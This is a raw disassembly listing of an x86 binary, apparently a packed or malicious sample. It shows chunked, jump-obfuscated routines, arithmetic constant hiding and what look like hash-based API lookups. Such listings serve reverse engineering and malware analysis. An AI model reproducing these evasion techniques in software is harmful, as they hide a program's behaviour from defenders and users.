loc_423771: ; CODE XREF: sub_425BD2+666�j
; sub_427C9B+D57�j
ror eax, 11h
mov ds:dword_428B08, eax
retn
; END OF FUNCTION CHUNK FOR sub_427C9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A78
loc_42377B: ; CODE XREF: sub_426A78-1987�j
; sub_427BCE:loc_427380�j
push offset sub_42442F
jmp nullsub_34
; END OF FUNCTION CHUNK FOR sub_426A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278DC
loc_423785: ; CODE XREF: sub_4278DC+270�j
ror eax, 0Bh
push ecx
push 76B591BBh
pop ecx
or ecx, 536FC631h
jmp loc_428571
; END OF FUNCTION CHUNK FOR sub_4278DC
; ---------------------------------------------------------------------------
loc_42379A: ; CODE XREF: hjohnhn9:loc_4237EF�j
mov edx, 0A22F8A70h
call sub_427C53
mov ds:dword_425AE8, eax
call sub_424877
mov edx, 0A2CD59D9h
call sub_427C53
jmp loc_427C4D
; ---------------------------------------------------------------------------
loc_4237BD: ; DATA XREF: sub_426354:loc_426E12�o
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
mov eax, ds:dword_4252DC[eax*4]
mov [ebp-8], eax
push offset sub_427A07
jmp locret_426EF8
; ---------------------------------------------------------------------------
sbb eax, 0F87F5BB0h
jmp sub_427AC0
; ---------------------------------------------------------------------------
mov ebx, [ecx]
jmp loc_426BF7
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42304F
loc_4237EA: ; CODE XREF: sub_42304F+4389�j
jmp loc_427102
; END OF FUNCTION CHUNK FOR sub_42304F
; ---------------------------------------------------------------------------
loc_4237EF: ; CODE XREF: hjohnhn9:0042351A�j
jmp loc_42379A
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4237F4 proc near ; CODE XREF: sub_423B05+40FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004233E6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00423963 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004243D4 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00424A46 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00424C46 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042680E SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00426B24 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426B2F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427DD2 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_426B24
sub_4237F4 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_69. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_107. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_423801: ; CODE XREF: hjohnhn9:00428491�j
jmp loc_427775
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427032
loc_423806: ; CODE XREF: sub_427032+10�j
jmp loc_424480
; END OF FUNCTION CHUNK FOR sub_427032
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A78
loc_42380B: ; CODE XREF: sub_424A78+233D�j
jmp loc_427637
; END OF FUNCTION CHUNK FOR sub_424A78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42841F
loc_423810: ; CODE XREF: sub_42841F-4708�j
jmp loc_427B02
; END OF FUNCTION CHUNK FOR sub_42841F
; ---------------------------------------------------------------------------
loc_423815: ; DATA XREF: sub_4278EC+5D2�o
call sub_425EA9
mov edx, 0E5254649h
call sub_427C53
mov ds:dword_423944, eax
jmp loc_426D87
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278EC
loc_42382E: ; CODE XREF: sub_4278EC:loc_427EAB�j
cmp ds:dword_423944, 0
jmp loc_4279E8
; END OF FUNCTION CHUNK FOR sub_4278EC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425CB3
loc_42383A: ; CODE XREF: sub_425CB3-17FA�j
mov ecx, edx
xchg ecx, [esp+0]
push ecx
push 0ED5F6B35h
pop ecx
jmp loc_427B97
; END OF FUNCTION CHUNK FOR sub_425CB3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_20. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466E
loc_42384C: ; CODE XREF: sub_42466E+F�j
jmp loc_425091
; END OF FUNCTION CHUNK FOR sub_42466E
; =============== S U B R O U T I N E =======================================
sub_423851 proc near ; DATA XREF: sub_428838+F�o
jnz loc_4287D2
push offset sub_4287BF
jmp nullsub_116
sub_423851 endp
; ---------------------------------------------------------------------------
shr edx, 4
adc edi, 1359C0Ah
jmp sub_428B28
; ---------------------------------------------------------------------------
js loc_426992
jmp sub_4275B2
; =============== S U B R O U T I N E =======================================
sub_42387A proc near ; CODE XREF: hjohnhn9:00426F80�j
; sub_427AC0+8F4�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00426685 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004270DD SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004271B3 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
xchg esi, [esp-4+arg_0]
push ecx
push 0B4C94AD3h
pop ecx
sub ecx, 0FA202DA4h
and ecx, 24F87E95h
jmp loc_4271B3
sub_42387A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428447
loc_423899: ; CODE XREF: sub_428447+12�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_428447
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_42389B: ; CODE XREF: sub_4262C5:loc_42761C�j
mov eax, [ebp-4]
cmp byte ptr [eax], 0
jnz loc_424E63
mov eax, [ebp-8]
loc_4238AA: ; CODE XREF: sub_427C9B:loc_426176�j
mov byte ptr [eax], 0
mov esp, ebp
jmp loc_423F0B
; END OF FUNCTION CHUNK FOR sub_4262C5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_129. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_4238B5: ; CODE XREF: sub_423B05+4104�j
jmp loc_423222
; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426354
loc_4238BA: ; CODE XREF: sub_426354-2FFE�j
mov edi, [ecx]
xor ebp, esi
shr edx, 7
loc_4238C1: ; CODE XREF: hjohnhn9:loc_423542�j
adc esi, 528F26C2h
jmp loc_427951
; END OF FUNCTION CHUNK FOR sub_426354
; =============== S U B R O U T I N E =======================================
sub_4238CC proc near ; CODE XREF: sub_424335:loc_425147�p
; hjohnhn9:00426703�j
; FUNCTION CHUNK AT 00425FFE SIZE 0000001B BYTES
xchg edi, [esp+0]
pop edi
push eax
push 9A99E2F0h
pop eax
add eax, 0DA55A7E8h
sub eax, 0BC0F8EC2h
rol eax, 15h
jmp loc_425FFE
sub_4238CC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4236A7
loc_4238EB: ; CODE XREF: sub_4236A7-60D�j
add ebx, 8083061h
add eax, ebx
pop ebx
mov edi, [eax]
add eax, 4
jmp loc_4232B4
; END OF FUNCTION CHUNK FOR sub_4236A7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424698
loc_4238FE: ; CODE XREF: sub_424698:loc_424F4D�j
or eax, eax
jnz loc_428E1B
jmp loc_424153
; END OF FUNCTION CHUNK FOR sub_424698
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_16. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427AC0
loc_42390C: ; CODE XREF: sub_427AC0:loc_424251�j
push eax
loc_42390D: ; CODE XREF: hjohnhn9:loc_425DDE�j
push 89045525h
pop eax
rol eax, 11h
test eax, 2
jmp loc_423B3E
; END OF FUNCTION CHUNK FOR sub_427AC0
; =============== S U B R O U T I N E =======================================
sub_423921 proc near ; DATA XREF: sub_4241E1+7�o
mov eax, [ebp-8]
mov esp, ebp
pop ebp
retn
sub_423921 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424698
loc_423928: ; CODE XREF: sub_424698+15CD�j
jmp loc_425001
; END OF FUNCTION CHUNK FOR sub_424698
; =============== S U B R O U T I N E =======================================
sub_42392D proc near ; CODE XREF: sub_4282F8-3B0E�p
; sub_427D9D:loc_424EE0�p ...
; FUNCTION CHUNK AT 00424E36 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00428AE8 SIZE 00000005 BYTES
jns sub_424E4F
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
jmp loc_428AE8
sub_42392D endp
; ---------------------------------------------------------------------------
dw 0F9BDh
dword_423940 dd 0 ; DATA XREF: hjohnhn9:00423C4A�r
; sub_427A36-1792�r ...
dword_423944 dd 77E79F93h ; DATA XREF: sub_4235D8+4�w
; hjohnhn9:00423824�w ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278B9
loc_423948: ; CODE XREF: sub_4278B9+18�j
jmp loc_42340D
; END OF FUNCTION CHUNK FOR sub_4278B9
; ---------------------------------------------------------------------------
db 2Fh, 1Ch, 0C1h
dword_423950 dd 0 ; DATA XREF: sub_424161-1035�r
; sub_425F93+4�w ...
dword_423954 dd 0 ; DATA XREF: sub_428788-5170�r
; hjohnhn9:loc_423A05�r ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424D38
loc_423958: ; CODE XREF: sub_424D38+3D7E�j
jmp nullsub_75
; END OF FUNCTION CHUNK FOR sub_424D38
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428477
loc_42395D: ; CODE XREF: sub_428477:loc_4267EC�j
jge loc_424ACA
; END OF FUNCTION CHUNK FOR sub_428477
; START OF FUNCTION CHUNK FOR sub_4237F4
loc_423963: ; CODE XREF: sub_4237F4+3341�j
jmp loc_424A46
; END OF FUNCTION CHUNK FOR sub_4237F4
; ---------------------------------------------------------------------------
xchg ecx, ebx
xor esi, 659A1899h
mov [ecx], edx
jmp loc_424AC9
; ---------------------------------------------------------------------------
loc_423977: ; CODE XREF: hjohnhn9:004269E1�j
jg loc_4235C4
adc esi, eax
jmp loc_42632C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424928
loc_423984: ; CODE XREF: sub_424928+3D17�j
; sub_424928+3D28�j
or esi, 0FC4A9892h
add esi, 1663DA1h
xchg esi, [esp+0]
jmp loc_428696
; END OF FUNCTION CHUNK FOR sub_424928
; ---------------------------------------------------------------------------
push offset sub_424B97
jmp loc_4290E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423E64
loc_4239A2: ; CODE XREF: sub_423E64+3471�j
pushf
ror ecx, 1Eh
loc_4239A6: ; CODE XREF: sub_423E64:loc_423CF0�j
push offset sub_427440
jmp locret_4232D0
; END OF FUNCTION CHUNK FOR sub_423E64
; ---------------------------------------------------------------------------
loc_4239B0: ; CODE XREF: hjohnhn9:loc_423408�j
cmp eax, [ebp-14h]
jb loc_426B3A
mov eax, [ebp-10h]
mov eax, [eax+64h]
add eax, [ebp-14h]
cmp eax, [ebp-0Ch]
ja loc_42300D
jmp loc_426B3A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428477
loc_4239D0: ; CODE XREF: sub_428477:loc_4252C8�j
mov [ebp+var_4], eax
loc_4239D3: ; CODE XREF: sub_423E64+C�j
; sub_4260BD-12FC�j ...
dec ds:dword_4233C4
mov eax, [ebp+var_4]
push offset loc_4281A2
jmp loc_424E8F
; END OF FUNCTION CHUNK FOR sub_428477
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_90. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_4239E7: ; CODE XREF: hjohnhn9:00427685�j
jmp sub_428192
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427994
loc_4239EC: ; CODE XREF: sub_427994:loc_4261F1�j
sub eax, 505B6FF8h
xor eax, 82A55006h
add eax, ebp
add eax, 0A9B1D40h
jmp loc_42678E
; END OF FUNCTION CHUNK FOR sub_427994
; ---------------------------------------------------------------------------
loc_423A05: ; DATA XREF: sub_423425+4EB4�o
cmp ds:dword_423954, 0
jnz loc_42879B
call nullsub_2
call sub_424877
mov edx, 0CF0182F6h
call sub_427C53
jmp loc_42846D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_423A2B: ; CODE XREF: sub_423B05-A2A�j
jp loc_427BF3
loc_423A31: ; CODE XREF: sub_423B05:loc_4230CE�j
call sub_424877
mov edx, 3CC6743Ch
call sub_4279ED
jmp loc_428C49
; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
js loc_423DAF
jmp sub_423BC3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_423A50: ; CODE XREF: sub_4260BD:loc_427431�j
push 538ACF62h
pop ebx
sub ebx, 4907E7DAh
or ebx, 0B92D1335h
xor ebx, 1E0EA8B3h
add ebx, ebp
add ebx, 5A5EA0EEh
jmp loc_42498B
; END OF FUNCTION CHUNK FOR sub_4260BD
; =============== S U B R O U T I N E =======================================
sub_423A75 proc near ; CODE XREF: sub_427564+13B9�j
; FUNCTION CHUNK AT 00426C69 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004271B8 SIZE 00000017 BYTES
push ebx
push 482FEEA0h
or ebx, esi
jmp loc_426C69
sub_423A75 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42325E
loc_423A82: ; CODE XREF: sub_42325E:loc_4276F7�j
jz loc_42520B
jmp loc_426F50
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
js loc_424CD3
jmp sub_42362A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427564
loc_423A98: ; CODE XREF: sub_427564:loc_428B22�j
sub edx, 9C16CC78h
jns loc_428912
jz loc_423D06
jmp loc_427D81
; END OF FUNCTION CHUNK FOR sub_427564
; =============== S U B R O U T I N E =======================================
sub_423AAF proc near ; CODE XREF: sub_4265CD:loc_424449�j
; sub_4265CD-857�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004246BB SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428027 SIZE 00000005 BYTES
push ebp
mov ebp, esi
xchg ebp, [esp+4+var_4]
push 0FC272739h
pop esi
sub esi, 945F967Eh
or esi, 1A7F9951h
sub esi, 0F7809293h
jmp loc_4246BB
sub_423AAF endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424698
loc_423AD2: ; CODE XREF: sub_424698+42A8�j
jz loc_428E07
add ebp, 40DAFCE5h
or ebx, 44198AFDh
loc_423AE4: ; CODE XREF: sub_427994:loc_427904�j
call sub_4245BA
; END OF FUNCTION CHUNK FOR sub_424698
; START OF FUNCTION CHUNK FOR sub_425029
loc_423AE9: ; CODE XREF: sub_425029:loc_42737B�j
add [ebp-8], eax
call sub_42865B
loc_423AF1: ; CODE XREF: hjohnhn9:0042664A�j
test ebx, eax
jmp loc_428823
; END OF FUNCTION CHUNK FOR sub_425029
; ---------------------------------------------------------------------------
push esi
add esi, 61FD5CF9h
jmp sub_428838
; ---------------------------------------------------------------------------
loc_423B04: ; CODE XREF: hjohnhn9:00425F8E�j
pop ecx
; =============== S U B R O U T I N E =======================================
sub_423B05 proc near ; CODE XREF: sub_4270CF+583�p
; FUNCTION CHUNK AT 004230CE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00423222 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004233E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423505 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00423648 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004238B5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423A2B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00423C5B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00424414 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00424B45 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004250B4 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00425252 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00425E64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004263DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004275E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427A44 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00427BF3 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00427EE2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004285EB SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042862B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428C49 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428D80 SIZE 00000023 BYTES
xchg eax, [esp+0]
pop eax
mov esp, ebp
pop ebp
mov eax, ds:dword_428398
or eax, eax
jnz loc_424414
jmp loc_424B45
sub_423B05 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_423B1F: ; CODE XREF: sub_4262C5:loc_423F0B�j
call sub_424E5D
loc_423B24: ; CODE XREF: sub_424631:loc_428BE3�j
cdq
rol eax, 11h
jmp loc_428B61
; END OF FUNCTION CHUNK FOR sub_4262C5
; ---------------------------------------------------------------------------
or edi, 0E54D5516h
jmp loc_42432F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_72. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_423B39: ; CODE XREF: hjohnhn9:00424281�j
jmp locret_4232E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427AC0
loc_423B3E: ; CODE XREF: sub_427AC0-41A4�j
jmp loc_424D04
; END OF FUNCTION CHUNK FOR sub_427AC0
; ---------------------------------------------------------------------------
push ebx
mov ebx, edi
; START OF FUNCTION CHUNK FOR sub_42325E
loc_423B46: ; CODE XREF: sub_42325E:loc_424E6B�j
xchg ebx, [esp+0]
mov edi, eax
jmp loc_423DF6
; END OF FUNCTION CHUNK FOR sub_42325E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_423B50: ; CODE XREF: sub_424161+43A4�j
push eax
call sub_426708
push 724752F0h
xchg ebp, [esp+0Ch+var_C]
jmp loc_426655
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
loc_423B63: ; DATA XREF: sub_423CCD:loc_427288�o
add dword ptr [ebp-8], 2
jmp loc_426996
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423B6C proc near ; CODE XREF: sub_424A78+19E�p
; sub_427FCE+4�p
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00426C2E SIZE 00000013 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
jmp loc_426C2E
sub_423B6C endp
; ---------------------------------------------------------------------------
push eax
mov eax, ebx
push offset sub_425C4B
jmp loc_425D6A
; =============== S U B R O U T I N E =======================================
sub_423B84 proc near ; CODE XREF: sub_424161-1D5�j
xchg ecx, [esp+0]
pop ecx
add ebx, 82E94C6Ah
mov [ebx], eax
pop ebx
retn
sub_423B84 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D0E
loc_423B92: ; CODE XREF: sub_428D0E-EC�j
jmp loc_4277C5
; END OF FUNCTION CHUNK FOR sub_428D0E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4278F6
loc_423B97: ; CODE XREF: sub_4278F6+9�j
jmp nullsub_33
; END OF FUNCTION CHUNK FOR sub_4278F6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424631
loc_423B9C: ; CODE XREF: sub_426708-544�j
; sub_424631+3B0B�j
call sub_427166
loc_423BA1: ; CODE XREF: sub_423B05+175E�j
mov [edx-10h], eax
inc dword ptr [ebp-4]
mov eax, [ebp+8]
mov eax, [eax-10h]
shr eax, 6
mov [ebp-10h], eax
jmp loc_426650
; END OF FUNCTION CHUNK FOR sub_424631
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42466E
loc_423BB8: ; CODE XREF: sub_42466E+571�j
jg loc_424033
jmp loc_424008
; END OF FUNCTION CHUNK FOR sub_42466E
; =============== S U B R O U T I N E =======================================
sub_423BC3 proc near ; CODE XREF: hjohnhn9:00423A4B�j
; sub_427440+4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00423388 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004236BB SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004241BE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042465F SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00424C7B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424FE3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425F6E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004260F9 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00426A84 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042713A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427825 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00427A7E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00428C84 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00428F9F SIZE 00000020 BYTES
xchg ebx, [esp+0]
pop ebx
push 0CA17F4Ah
pop edx
rol edx, 15h
and edx, 5FE7D04h
xor edx, 107BF9A6h
test edx, 10h
jmp loc_4236BB
sub_423BC3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423369
loc_423BE7: ; CODE XREF: sub_423369+1A�j
mov [ecx+0B8h], eax
pop ecx
xor eax, eax
retn
; END OF FUNCTION CHUNK FOR sub_423369
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_423BF1: ; CODE XREF: sub_4260BD+2F7C�j
jmp loc_426EE5
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4236A7
loc_423BF6: ; CODE XREF: sub_4236A7+E�j
jmp loc_425D7B
; END OF FUNCTION CHUNK FOR sub_4236A7
; ---------------------------------------------------------------------------
loc_423BFB: ; DATA XREF: sub_423369+14�o
xor eax, eax
jmp loc_424728
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424819
loc_423C02: ; CODE XREF: sub_424819-7F2�j
test ebx, 2000h
jmp loc_426B97
; END OF FUNCTION CHUNK FOR sub_424819
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4262C5
loc_423C0D: ; CODE XREF: sub_4262C5+1D80�j
jz loc_423551
sbb ecx, edx
jmp loc_4264E3
; END OF FUNCTION CHUNK FOR sub_4262C5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424D99
loc_423C1A: ; CODE XREF: sub_424D99:loc_424003�j
jl loc_423EFA
sub ecx, edx
push 0AEFB675Bh
xchg ecx, [esi]
jmp loc_423EF4
; END OF FUNCTION CHUNK FOR sub_424D99
; ---------------------------------------------------------------------------
test edx, 0DE971895h
jmp loc_428351
; ---------------------------------------------------------------------------
loc_423C39: ; CODE XREF: hjohnhn9:00424467�j
test ebp, 3E5EE592h
jmp loc_427480
; ---------------------------------------------------------------------------
loc_423C44: ; DATA XREF: sub_428E65+7�o
jz loc_427EAB
mov eax, ds:dword_423940
mov eax, [eax]
call sub_4235D8
; START OF FUNCTION CHUNK FOR sub_42677F
loc_423C56: ; CODE XREF: sub_42677F+A�j
jmp loc_427F33
; END OF FUNCTION CHUNK FOR sub_42677F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B05
loc_423C5B: ; CODE XREF: sub_423B05-4B5�j
jo loc_423659
jnb loc_4267FC
loc_423C67: ; CODE XREF: sub_423B05:loc_42862B�j
push 7A23220Ah
pop eax
jmp loc_4275E9
; END OF FUNCTION CHUNK FOR sub_423B05
; ---------------------------------------------------------------------------
loc_423C72: ; CODE XREF: hjohnhn9:loc_428621�j
mov eax, [ebp-20h]
mov byte ptr [eax], 6Ch
inc dword ptr [ebp-20h]
push offset sub_426F5A
jmp loc_428ECB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4284CB
loc_423C85: ; CODE XREF: sub_4284CB:loc_42655C�j
cmp byte ptr [eax], 0EBh
call sub_4231AD
loc_423C8D: ; DATA XREF: sub_424161-294�o
mov [ebp-20h], eax
; END OF FUNCTION CHUNK FOR sub_4284CB
; START OF FUNCTION CHUNK FOR sub_424161
loc_423C90: ; CODE XREF: sub_424161+E�j
; sub_426C1C+D�j ...
mov eax, [ebp-20h]
sub eax, [ebp-28h]
mov [ebp-24h], eax
mov eax, [ebp-24h]
jmp loc_426E7A
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4260BD
loc_423CA1: ; CODE XREF: sub_4260BD-172C�j
push 78C9D3B0h
pop ebx
or ebx, 49478D09h
xor ebx, 2FC1EEDBh
sub ebx, 898416F6h
cmp ebx, 0DEADBCE0h
jmp loc_42409B
; END OF FUNCTION CHUNK FOR sub_4260BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424161
loc_423CC4: ; CODE XREF: sub_424161:loc_426E7A�j
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_424161
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423D67
loc_423CC8: ; CODE XREF: sub_423D67+1B�j
jmp loc_4236E4
; END OF FUNCTION CHUNK FOR sub_423D67
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423CCD proc near ; CODE XREF: sub_426C1C+4�p
; sub_424161+446E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 004271DA SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00427272 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00427B92 SIZE 00000005 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_4], eax
jmp loc_427B92
sub_423CCD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423CDB proc near ; CODE XREF: hjohnhn9:00426B74�j
; sub_4289B2:loc_4289BB�p
; FUNCTION CHUNK AT 0042407B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00424BB4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424CA5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425076 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425EFB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426268 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00426762 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 004267F1 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00426B13 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426B1F SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00426D2F SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00427449 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427B9C SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004283F7 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042869B SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00428851 SIZE 00000020 BYTES
xchg eax, [esp+0]
pop eax
mov [ebp-4], eax
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jmp loc_4267F1
sub_423CDB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423E64
loc_423CF0: ; CODE XREF: sub_423E64+12�j
jnz loc_4239A6
jmp loc_4272D3
; END OF FUNCTION CHUNK FOR sub_423E64
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_32. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_423CFC: ; CODE XREF: hjohnhn9:0042307C�j
; hjohnhn9:00424277�j
xor ebx, ecx
and ebx, 0B4897EE5h
xchg edx, [ecx]
; START OF FUNCTION CHUNK FOR sub_427564
loc_423D06: ; CODE XREF: sub_427564-3AC0�j
; hjohnhn9:loc_42426B�j
xor ecx, 36F2DCB7h
jmp loc_42901D
; END OF FUNCTION CHUNK FOR sub_427564
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42841F
loc_423D11: ; CODE XREF: sub_42841F+12�j
jz loc_42658E
jmp loc_423810
; END OF FUNCTION CHUNK FOR sub_42841F
; =============== S U B R O U T I N E =======================================
sub_423D1C proc near ; DATA XREF: hjohnhn9:0042427C�o
; FUNCTION CHUNK AT 0042415E SIZE 00000003 BYTES
push eax
ror eax, 1Ah
push edi
call sub_426211
and edi, 9193273h
jmp loc_42415E
